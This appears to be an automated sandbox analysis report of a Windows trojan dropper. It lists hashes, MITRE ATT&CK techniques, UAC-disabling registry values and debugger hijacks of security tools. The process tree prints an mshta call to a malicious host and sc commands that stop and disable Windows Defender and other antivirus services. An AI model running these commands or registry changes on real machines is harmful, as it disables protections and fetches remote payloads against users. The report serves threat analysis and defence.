b76b2e9356507b2d1c8157c0f885592d27e8dc9c8d95e6024e041d758d94d5a1

Analysis

max time kernel
150s
max time network
131s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
19/06/2024, 20:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0077c2fd7e98b372a973640ebdb67bb4_JaffaCakes118.exe
Size

2.0MB
MD5

0077c2fd7e98b372a973640ebdb67bb4
SHA1

687f3783243b3da71d0cb882318224df3406a11c
SHA256

b76b2e9356507b2d1c8157c0f885592d27e8dc9c8d95e6024e041d758d94d5a1
SHA512

5866d2e329e5e7aff9e306af17c9cf7ddf7a4f47eb42f3473470af7ffb57af2c6473c1062f645369f050cb7852017f0d3dfbdabf84064c0508f77a6778d9e9aa
SSDEEP

49152:DLqatPmogbmVZBTN1xC05KRkgc68WJI5NeGu5dkpFpERe8JjVwv14x4Q:DbmHb0f1CRNRJuIGu5mpFpERe8s1i

Score

10^/10

evasion execution persistence trojan

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://galaint.coolsecupdate.info/?0=112&1=8&2=1&3=33&4=i&5=9200&6=6&7=2&8=919041&9=1033&10=0&11=0000&12=vvibltkbjg&14=1

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002

UAC bypass 3 TTPs 3 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Protector-rtce.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"	Protector-rtce.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Protector-rtce.exe

Disables taskbar notifications via registry modification
evasion

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winav.exe	Protector-rtce.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgdumpx.exe\Debugger = "svchost.exe"	Protector-rtce.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avpupd.exe\Debugger = "svchost.exe"	Protector-rtce.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avsched32.exe	Protector-rtce.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\crashrep.exe	Protector-rtce.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\intdel.exe\Debugger = "svchost.exe"	Protector-rtce.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\kavpf.exe\Debugger = "svchost.exe"	Protector-rtce.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ldscan.exe	Protector-rtce.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\proport.exe\Debugger = "svchost.exe"	Protector-rtce.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\McSACore.exe\Debugger = "svchost.exe"	Protector-rtce.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TPSrv.exe\Debugger = "svchost.exe"	Protector-rtce.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\w9x.exe\Debugger = "svchost.exe"	Protector-rtce.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sms.exe\Debugger = "svchost.exe"	Protector-rtce.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ent.exe	Protector-rtce.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\gmt.exe	Protector-rtce.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\platin.exe\Debugger = "svchost.exe"	Protector-rtce.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\aswUpdSv.exe\Debugger = "svchost.exe"	Protector-rtce.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashSkPcc.exe\Debugger = "svchost.exe"	Protector-rtce.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\claw95cf.exe\Debugger = "svchost.exe"	Protector-rtce.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ctrl.exe\Debugger = "svchost.exe"	Protector-rtce.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nvarch16.exe	Protector-rtce.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger = "svchost.exe"	Protector-rtce.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zonalm2601.exe\Debugger = "svchost.exe"	Protector-rtce.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AdwarePrj.exe	Protector-rtce.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\aupdate.exe\Debugger = "svchost.exe"	Protector-rtce.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cpf9x206.exe\Debugger = "svchost.exe"	Protector-rtce.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iamapp.exe	Protector-rtce.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nupgrade.exe	Protector-rtce.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\aAvgApi.exe\Debugger = "svchost.exe"	Protector-rtce.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avpupd.exe	Protector-rtce.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\blackice.exe	Protector-rtce.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfpconfg.exe	Protector-rtce.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ldpromenu.exe\Debugger = "svchost.exe"	Protector-rtce.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winppr32.exe	Protector-rtce.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pavsrv51.exe	Protector-rtce.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mctool.exe\Debugger = "svchost.exe"	Protector-rtce.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\aswRunDll.exe\Debugger = "svchost.exe"	Protector-rtce.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netmon.exe\Debugger = "svchost.exe"	Protector-rtce.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vsstat.exe	Protector-rtce.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\a.exe\Debugger = "svchost.exe"	Protector-rtce.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atcon.exe\Debugger = "svchost.exe"	Protector-rtce.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgchk.exe	Protector-rtce.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\beagle.exe	Protector-rtce.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\start.exe	Protector-rtce.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tfak.exe	Protector-rtce.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\virusmdpersonalfirewall.exe	Protector-rtce.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vpc32.exe	Protector-rtce.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\luinit.exe	Protector-rtce.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mcnasvc.exe	Protector-rtce.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avwin95.exe	Protector-rtce.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iamstats.exe	Protector-rtce.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\purge.exe	Protector-rtce.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\shn.exe\Debugger = "svchost.exe"	Protector-rtce.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\McSACore.exe	Protector-rtce.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\gator.exe\Debugger = "svchost.exe"	Protector-rtce.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netutils.exe	Protector-rtce.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\onsrvr.exe	Protector-rtce.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\realmon.exe\Debugger = "svchost.exe"	Protector-rtce.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\spywarexpguard.exe\Debugger = "svchost.exe"	Protector-rtce.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\win32.exe\Debugger = "svchost.exe"	Protector-rtce.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\av360.exe	Protector-rtce.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\npf40_tw_98_nt_me_2k.exe	Protector-rtce.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\oasrv.exe\Debugger = "svchost.exe"	Protector-rtce.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procdump.exe\Debugger = "svchost.exe"	Protector-rtce.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	0077c2fd7e98b372a973640ebdb67bb4_JaffaCakes118.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	6884gab1kb8k3p1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation	l089d0966e530b3.exe

Executes dropped EXE 3 IoCs

pid	Process
1864	6884gab1kb8k3p1.exe
2964	l089d0966e530b3.exe
1604	Protector-rtce.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Inspector = "C:\\Users\\Admin\\AppData\\Roaming\\Protector-rtce.exe"	Protector-rtce.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Protector-rtce.exe

Drops file in System32 directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\services.msc	Protector-rtce.exe
File opened for modification	C:\Windows\SysWOW64\eventvwr.msc	Protector-rtce.exe
File opened for modification	C:\Windows\SysWOW64\diskmgmt.msc	Protector-rtce.exe

Launches sc.exe 8 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4812	sc.exe
4676	sc.exe
3796	sc.exe
4240	sc.exe
3012	sc.exe
3356	sc.exe
2384	sc.exe
2156	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE ERROR PAGE BYPASS ZONE CHECK FOR HTTPS KB954312	Protector-rtce.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE ERROR PAGE BYPASS ZONE CHECK FOR HTTPS KB954312\iexplore.exe = "1"	Protector-rtce.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2964	l089d0966e530b3.exe
Token: SeShutdownPrivilege	2964	l089d0966e530b3.exe
Token: SeDebugPrivilege	1604	Protector-rtce.exe
Token: SeShutdownPrivilege	1604	Protector-rtce.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe

Suspicious use of SendNotifyMessage 4 IoCs

pid	Process
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
2964	l089d0966e530b3.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe
1604	Protector-rtce.exe

Suspicious use of WriteProcessMemory 39 IoCs

description	pid	Process	procid_target
PID 4964 wrote to memory of 1864	4964	0077c2fd7e98b372a973640ebdb67bb4_JaffaCakes118.exe	83
PID 4964 wrote to memory of 1864	4964	0077c2fd7e98b372a973640ebdb67bb4_JaffaCakes118.exe	83
PID 4964 wrote to memory of 1864	4964	0077c2fd7e98b372a973640ebdb67bb4_JaffaCakes118.exe	83
PID 1864 wrote to memory of 2964	1864	6884gab1kb8k3p1.exe	86
PID 1864 wrote to memory of 2964	1864	6884gab1kb8k3p1.exe	86
PID 1864 wrote to memory of 2964	1864	6884gab1kb8k3p1.exe	86
PID 2964 wrote to memory of 1604	2964	l089d0966e530b3.exe	87
PID 2964 wrote to memory of 1604	2964	l089d0966e530b3.exe	87
PID 2964 wrote to memory of 1604	2964	l089d0966e530b3.exe	87
PID 2964 wrote to memory of 60	2964	l089d0966e530b3.exe	88
PID 2964 wrote to memory of 60	2964	l089d0966e530b3.exe	88
PID 2964 wrote to memory of 60	2964	l089d0966e530b3.exe	88
PID 1604 wrote to memory of 3368	1604	Protector-rtce.exe	90
PID 1604 wrote to memory of 3368	1604	Protector-rtce.exe	90
PID 1604 wrote to memory of 3368	1604	Protector-rtce.exe	90
PID 1604 wrote to memory of 3012	1604	Protector-rtce.exe	92
PID 1604 wrote to memory of 3012	1604	Protector-rtce.exe	92
PID 1604 wrote to memory of 3012	1604	Protector-rtce.exe	92
PID 1604 wrote to memory of 3356	1604	Protector-rtce.exe	93
PID 1604 wrote to memory of 3356	1604	Protector-rtce.exe	93
PID 1604 wrote to memory of 3356	1604	Protector-rtce.exe	93
PID 1604 wrote to memory of 4240	1604	Protector-rtce.exe	94
PID 1604 wrote to memory of 4240	1604	Protector-rtce.exe	94
PID 1604 wrote to memory of 4240	1604	Protector-rtce.exe	94
PID 1604 wrote to memory of 2384	1604	Protector-rtce.exe	96
PID 1604 wrote to memory of 2384	1604	Protector-rtce.exe	96
PID 1604 wrote to memory of 2384	1604	Protector-rtce.exe	96
PID 1604 wrote to memory of 2156	1604	Protector-rtce.exe	98
PID 1604 wrote to memory of 2156	1604	Protector-rtce.exe	98
PID 1604 wrote to memory of 2156	1604	Protector-rtce.exe	98
PID 1604 wrote to memory of 3796	1604	Protector-rtce.exe	100
PID 1604 wrote to memory of 3796	1604	Protector-rtce.exe	100
PID 1604 wrote to memory of 3796	1604	Protector-rtce.exe	100
PID 1604 wrote to memory of 4676	1604	Protector-rtce.exe	101
PID 1604 wrote to memory of 4676	1604	Protector-rtce.exe	101
PID 1604 wrote to memory of 4676	1604	Protector-rtce.exe	101
PID 1604 wrote to memory of 4812	1604	Protector-rtce.exe	102
PID 1604 wrote to memory of 4812	1604	Protector-rtce.exe	102
PID 1604 wrote to memory of 4812	1604	Protector-rtce.exe	102

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	Protector-rtce.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Protector-rtce.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Protector-rtce.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"	Protector-rtce.exe

C:\Users\Admin\AppData\Local\Temp\0077c2fd7e98b372a973640ebdb67bb4_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\0077c2fd7e98b372a973640ebdb67bb4_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4964
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\6884gab1kb8k3p1.exe
  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\6884gab1kb8k3p1.exe" -e -p7lf02436t7m3i73
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1864
- - C:\Users\Admin\AppData\Local\Temp\RarSFX1\l089d0966e530b3.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\l089d0966e530b3.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2964
  - - C:\Users\Admin\AppData\Roaming\Protector-rtce.exe
      C:\Users\Admin\AppData\Roaming\Protector-rtce.exe
      4⤵
      UAC bypass
      Event Triggered Execution: Image File Execution Options Injection
      Executes dropped EXE
      Adds Run key to start application
      Checks whether UAC is enabled
      Drops file in System32 directory
      Modifies Internet Explorer settings
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      System policy modification
      PID:1604
    - - C:\Windows\SysWOW64\mshta.exe
        
        mshta.exe "http://galaint.coolsecupdate.info/?0=112&1=8&2=1&3=33&4=i&5=9200&6=6&7=2&8=919041&9=1033&10=0&11=0000&12=vvibltkbjg&14=1"
        5⤵
        
        PID:3368
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop WinDefend
        5⤵
        Launches sc.exe
        
        PID:3012
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config WinDefend start= disabled
        5⤵
        Launches sc.exe
        
        PID:3356
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop msmpsvc
        5⤵
        Launches sc.exe
        
        PID:4240
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config msmpsvc start= disabled
        5⤵
        Launches sc.exe
        
        PID:2384
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config ekrn start= disabled
        5⤵
        Launches sc.exe
        
        PID:2156
    - - C:\Windows\SysWOW64\sc.exe
        
        sc stop AntiVirService
        5⤵
        Launches sc.exe
        
        PID:3796
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config AntiVirService start= disabled
        5⤵
        Launches sc.exe
        
        PID:4676
    - - C:\Windows\SysWOW64\sc.exe
        
        sc config AntiVirSchedulerService start= disabled
        5⤵
        Launches sc.exe
        
        PID:4812
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\L089D0~1.EXE" >> NUL
      4⤵
      PID:60

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RarSFX0\6884gab1kb8k3p1.exe

Filesize
2.0MB

MD5
1a45a0c072a3a8dbd8a3b8d92894e3f8

SHA1
1e6db89437e0fd3bcb14c6c9dbe1ce98bb286c20

SHA256
43bb6c5aac2f0a5b2597b274c69a0fac1d5d5bd6f62fed8a7b6a203cea3d3325

SHA512
689531c4c6091f2124dd4a1750fd4b04fe282d2a61cd51ea5dc936609939f27a3025b0613384bc792c9bd57f64824535fc96ab9eca2e0dd19fb07be13dd16d42

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX1\l089d0966e530b3.exe

Filesize
1.9MB

MD5
b5ff5ef86e7f83fe0ea09efa4b2a13a5

SHA1
af3ad93fb39011d8f659fa6f4947664063319f59

SHA256
94ef4a33bf5a8f36f70612b010eebc80ef605a4ddc4526d8dd1554c5f3030019

SHA512
6dfd92e8a86fe13b0850d02551a98ee2a120087180a9263966f7e14b8a54ffa147cbe90da3fb54848a718ad8ca4b3e98dcf1c60eb8d484fdbc62390c95fef9cc

Download Submit
memory/1604-47-0x0000000000400000-0x00000000007F6000-memory.dmp

Filesize
4.0MB

Download
memory/1604-43-0x0000000000400000-0x00000000007F6000-memory.dmp

Filesize
4.0MB

Download
memory/1604-51-0x0000000000400000-0x00000000007F6000-memory.dmp

Filesize
4.0MB

Download
memory/1604-37-0x0000000000400000-0x00000000007F6000-memory.dmp

Filesize
4.0MB

Download
memory/1604-40-0x0000000000400000-0x00000000007F6000-memory.dmp

Filesize
4.0MB

Download
memory/1604-41-0x0000000000400000-0x00000000007F6000-memory.dmp

Filesize
4.0MB

Download
memory/1604-42-0x0000000000400000-0x00000000007F6000-memory.dmp

Filesize
4.0MB

Download
memory/1604-23-0x0000000000400000-0x00000000007F6000-memory.dmp

Filesize
4.0MB

Download
memory/1604-44-0x0000000000400000-0x00000000007F6000-memory.dmp

Filesize
4.0MB

Download
memory/1604-46-0x0000000000400000-0x00000000007F6000-memory.dmp

Filesize
4.0MB

Download
memory/1604-49-0x0000000000400000-0x00000000007F6000-memory.dmp

Filesize
4.0MB

Download
memory/1604-48-0x0000000000400000-0x00000000007F6000-memory.dmp

Filesize
4.0MB

Download
memory/2964-18-0x0000000000400000-0x00000000007F6000-memory.dmp

Filesize
4.0MB

Download
memory/2964-25-0x0000000000400000-0x00000000007F6000-memory.dmp

Filesize
4.0MB

Download